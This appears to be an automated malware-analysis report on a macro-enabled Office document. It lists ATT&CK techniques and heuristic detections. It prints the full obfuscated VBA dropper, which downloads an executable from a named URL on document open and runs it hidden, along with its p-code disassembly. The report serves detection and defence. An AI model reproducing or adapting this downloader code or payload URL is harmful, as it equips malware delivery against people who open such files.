MALICIOUS
258
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Office document that uses a lure to trick the user into enabling macros. The embedded VBA macro, identified as 'macros.bas', contains a call to the URLDownloadToFileA API to download a second-stage executable from 'http://golfshoesamerica.com/css/1/c1.exe'. This executable is then saved to the temporary directory and executed.
Heuristics 9
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell Jawul, vbHide -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds Lib "urlmon" Alias "URLDownloadToFileA" (ByVal c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1 As LongPtr, ByVal a64e06b120f74094aaac7d12d37286bea44f82cbae824b7f90d3083953e074f9 As String, ByVal f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597 As String, ByVal ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 As LongPtr, ByVal c4a430dfaf5343dca7f2601344 … -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52)) & ".exe" -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://golfshoesamerica.com/css/1/c1.exe Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6792 bytes |
SHA-256: 224994afea60a5c28c1cc0ae0ee921988fcb8f6c04e959e36d707cb90da48788 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim f2cc230470d44a01bb95c7a9b6e55a93 As New f50872114f9340d2b22b3df03390a8
Dim jsosoisdisoiosji As String
bcb9c46500c54ec4bd4c503fe5fa4b52 = "http://golfshoesamerica.com/css/1/c1.exe"
JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52)) & ".exe"
jsosoisdisoiosji = JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984
f2cc230470d44a01bb95c7a9b6e55a93.POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds bcb9c46500c54ec4bd4c503fe5fa4b52, JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984
sdffdsfdfsdfsdfds898498zerzerez.Likmarhoustaaaan (jsosoisdisoiosji)
End Sub
Attribute VB_Name = "f50872114f9340d2b22b3df03390a8"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If Win64 Then
Private Declare PtrSafe Function SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds Lib "urlmon" Alias "URLDownloadToFileA" (ByVal c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1 As LongPtr, ByVal a64e06b120f74094aaac7d12d37286bea44f82cbae824b7f90d3083953e074f9 As String, ByVal f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597 As String, ByVal ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 As LongPtr, ByVal c4a430dfaf5343dca7f2601344f0fdffa1a741f131f9482c81baed781093ac38 As LongPtr) As LongPtr
#Else
Private Declare PtrSafe Function SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds Lib "urlmon" Alias "URLDownloadToFileA" (ByVal c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1 As Long, ByVal a64e06b120f74094aaac7d12d37286bea44f82cbae824b7f90d3083953e074f9 As String, ByVal f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597 As String, ByVal ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 As Long, ByVal c4a430dfaf5343dca7f2601344f0fdffa1a741f131f9482c81baed781093ac38 As Long) As Long
#End If
Sub POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds(JPMLJLDJSFKKMJFSDKLJFSDJKLFDSKJSDFJJPDSFDOFSPIOJPIIPOoeziozieoroizerrezio44489948489849FSDFDSFSD41448, f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91)
SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds 0, JPMLJLDJSFKKMJFSDKLJFSDJKLFDSKJSDFJJPDSFDOFSPIOJPIIPOoeziozieoroizerrezio44489948489849FSDFDSFSD41448, f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91, 0, 0
End Sub
Attribute VB_Name = "sdffdsfdfsdfsdfds898498zerzerez"
Sub Likmarhoustaaaan(Jawul As String)
Shell Jawul, vbHide
End Sub
' Processing file: /opt/analyzer/scan_staging/ab37ac693047480d9888b3d695dfcc08.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2750 bytes
' Line #0:
' FuncDefn (Sub bcb9c46500c54ec4bd4c503fe5fa4b52())
' Line #1:
' Dim
' VarDefn JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984 (New As Environ)
' Line #2:
' Dim
' VarDefn InStrRev (As String)
' Line #3:
' LitStr 0x0028 "http://golfshoesamerica.com/css/1/c1.exe"
' St POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' Line #4:
' LitStr 0x0003 "tmp"
' ArgsLd Likmarhoustaaaan 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' Ld POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' LitStr 0x0001 "/"
' ArgsLd SDFJPIOSDFOIFDSJOjiodsfjfdjofsdf4489849849sdffdssfdfsddsffds 0x0002
' LitDI2 0x0001
' Add
' Ld POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' FnLen
' ArgsLd Mid 0x0003
' Concat
' LitStr 0x0004 ".exe"
' Concat
' St sdffdsfdfsdfsdfds898498zerzerez
' Line #5:
' Ld sdffdsfdfsdfsdfds898498zerzerez
' St InStrRev
' Line #6:
' Ld POPPPKOOPK44948894849948SFDFDSSDFSDFSFD456456645ze1r2ze65SDFSDSDFdsffds
' Ld sdffdsfdfsdfsdfds898498zerzerez
' Ld JPOIJOPIOJPSDF448998484SDSDFDFSDSFDSFSDFJOPSDJOJPOIJIPOJEZRIOZREZEREZR4194894984
' ArgsMemCall c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1 0x0002
' Line #7:
' Ld InStrRev
' Paren
' Ld a64e06b120f74094aaac7d12d37286bea44f82cbae824b7f90d3083953e074f9
' ArgsMemCall f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597 0x0001
' Line #8:
' EndSub
' Macros/VBA/f50872114f9340d2b22b3df03390a8 - 3187 bytes
' Line #0:
' LbMark
' Ld Project
' LbIf
' Line #1:
' FuncDefn (Private Declare PtrSafe Function ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 Lib "Shell" (ByVal c4a430dfaf5343dca7f2601344f0fdffa1a741f131f9482c81baed781093ac38 As LongPtr, ByVal urlmon As String, ByVal JPMLJLDJSFKKMJFSDKLJFSDJKLFDSKJSDFJJPDSFDOFSPIOJPIIPOoeziozieoroizerrezio44489948489849FSDFDSFSD41448 As String, ByVal f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91 As LongPtr, ByVal Jawul As LongPtr) As LongPtr)
' Line #2:
' LbMark
' LbElse
' Line #3:
' FuncDefn (Private Declare PtrSafe Function ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 Lib "Shell" (ByVal c4a430dfaf5343dca7f2601344f0fdffa1a741f131f9482c81baed781093ac38 As Long, ByVal urlmon As String, ByVal JPMLJLDJSFKKMJFSDKLJFSDJKLFDSKJSDFJJPDSFDOFSPIOJPIIPOoeziozieoroizerrezio44489948489849FSDFDSFSD41448 As String, ByVal f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91 As Long, ByVal Jawul As Long) As Long)
' Line #4:
' LbMark
' LbEndIf
' Line #5:
' FuncDefn (Sub c2015c12b60343ab912985f78bf6ed5eabe8a9428c3241c79e3d7500710495f1(vbHide, Document))
' Line #6:
' LitDI2 0x0000
' Ld vbHide
' Ld Document
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall ab3104d3e2b543c7b0a403f66a99572cc5fa428c8da54032903c85fb489a12a9 0x0005
' Line #7:
' EndSub
' Line #8:
' Macros/VBA/sdffdsfdfsdfsdfds898498zerzerez - 1339 bytes
' Line #0:
' FuncDefn (Sub f5d278577662452d82030f2a9493b7d4aa756eb0a65e47489fc37bc124c91597(Class As String))
' Line #1:
' Ld Class
' Ld _B_var_Environ
' ArgsCall _B_var_bcb9c46500c54ec4bd4c503fe5fa4b52 0x0002
' Line #2:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.